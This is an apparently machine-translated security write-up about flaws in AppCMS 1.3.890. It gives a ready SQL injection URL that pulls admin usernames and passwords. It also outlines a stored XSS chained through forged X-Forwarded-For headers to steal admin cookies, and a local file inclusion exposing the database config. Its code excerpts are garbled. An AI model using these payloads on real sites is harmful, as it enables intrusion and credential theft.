AppCMS injection and comment on xss vulnerabilities

0x02 SQL Injection principles

Download the latest version appcms_1.3.890.
Check index. php. There is a piece of code that seems to limit the search term:
If (! Preg_match ("/^ [\ x {4e00}-\ x {9fa5} \ w {0}] + $/u", $ _ GET ['q']) {
Die ('only the underline, number, letter, Chinese character, and space are allowed for the search term. Please enter it again. Click Here <a href = "'. SITE_PATH.'"> back to homepage </a> ');
}
Therefore, when we search for keywords that contain 'on the homepage, the following message is displayed:



But as we looked forward, we found a piece of ajax output code, which was not filtered at this time ...... Therefore, injection is generated as follows:

// Ajax request Lenovo keyword 2. if (trim ($ _ GET ['q'])! = ''&&! Isset ($ _ GET ['tpl']) {3. $ str = ''; 4. $ SQL = "SELECT app_id, app_title, app_down FROM ". TB_PREFIX. "app_list WHERE app_title LIKE '% ". trim ($ _ GET ['q']). "% 'limit 15"; 5. $ app_list = $ dbm-> query ($ SQL); 6. if (count ($ app_list ['LIST'])> 0) {7. foreach ($ app_list ['LIST'] as $ k => $ v) {8. $ app_list ['LIST'] [$ k] ['app _ title'] = helper: utf8_substr ($ v ['app _ title'], 0, 20 ); 9 .} 10. echo json_encode ($ app_list ['LIST']); 11. exit; 12 .} else {13. exit; 14 .} 15 .}

IF $ _ GET ['q'] is not empty and $ _ GET ['tpl '] is empty, this IF is entered because the parameters we searched for are as follows :? Tpl = search & q = 'sd, so this if is not entered.
In this if statement, trim ($ _ GET ['q']) is directly included in the select statement, resulting in injection.
Use exp:

index.php?q=xxoo'union select 1,uname,upass from appcms_admin_list where uid like '

However, the administrator password is also a little bad because the cms forces the user to modify the background address. Therefore, we need to find a way to get the background address. Therefore, the following xss is generated.


<Span: 700; "=" "> 0x03 XSS Principle

Comment. php gets the IP address and inserts it into the database:

/** 2. * obtain the Client IP address. 3. */4. public static function getip () {5. $ onlineip = ''; 6. if (getenv ('HTTP _ CLIENT_IP ') & strcasecmp (getenv ('HTTP _ CLIENT_IP'), 'unknown ') {7. $ onlineip = getenv ('HTTP _ CLIENT_IP '); 8 .} elseif (getenv ('HTTP _ X_FORWARDED_FOR ') & strcasecmp (getenv ('HTTP _ X_FORWARDED_FOR'), 'unknown ') {9. $ onlineip = getenv ('HTTP _ X_FORWARDED_FOR '); 10 .} elseif (getenv ('remote _ ADDR ') & strcasecmp (getenv ('remote _ ADDR'), 'unknown ') {11. $ onlineip = getenv ('remote _ ADDR '); 12 .} elseif (isset ($ _ SERVER ['remote _ ADDR ']) & $ _ SERVER ['remote _ ADDR '] & strcasecmp ($ _ SERVER ['remote _ ADDR'], 'unknown ') {13. $ onlineip = $ _ SERVER ['remote _ ADDR ']; 14 .} 15. return $ onlineip; 16 .}

When HTTP_X_FORWARDED_FOR exists, the obtained IP address is it, But HTTP_X_FORWARDED_FOR can be forged, resulting in XSS code injection.
However, in the database, the ip field is limited to 20 words, so bypassing becomes a challenge.

So we construct it.
First, let's leave a comment on the xss code we want to write. Here is a simple pop-up window:

When posting capture, modify the X-FORWARDED-FOR, write a half closed script:

Then, refresh the page and write a message again. The content does not matter. It is still packet capture. Write the First Half of the script Tag:

At this time, even if the task is completed, it will wait for the cookie and background address to be received.

We can go to the Administrator page and view the comments. The window is displayed:

Let's look at the source code:

Have you understood it? The content inserted twice is closed, and comments are commented out in the middle. The comment content inserted for the first time is our javascript code, the code can be closed with a annotator twice.

We successfully constructed an xss using two messages, bypassing the limit of the maximum length of 20.

0x04 LFI
In addition to the above two successful vulnerabilities, there is also a local file in index. php, but it needs to be truncated.

If (substr ($ tpl, strlen ($ tpl)-4, 4) = '. php ') {2. $ tmp_file = '/templates /'. $ from_mobile. '/'. $ tpl; 3 .} else {4. $ tmp_file = '/templates /'. $ from_mobile. '/'. $ tpl. '. php '; 5 .} 6. if (! File_exists (dirname (_ FILE __). $ tmp_file) die ('template page does not exist '. $ tmp_file); 7. require (dirname (_ FILE __). $ tmp_file );

Determine whether the suffix is php. If not, Add. php and check whether the file exists and contains the file. There is no filtering. The initial $ tpl is $ _ GET ['tpl'].
Official Website test:

The database configuration file is successfully included, and an error occurs because the file is already included.
I tried to truncate some log files or other files (unfortunately, the front-end cannot upload them), but I don't know why they didn't succeed. If you have any good ideas, please let me know.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This is the end of the big gift package. I hope you can learn more, instead of getting a lot of servers.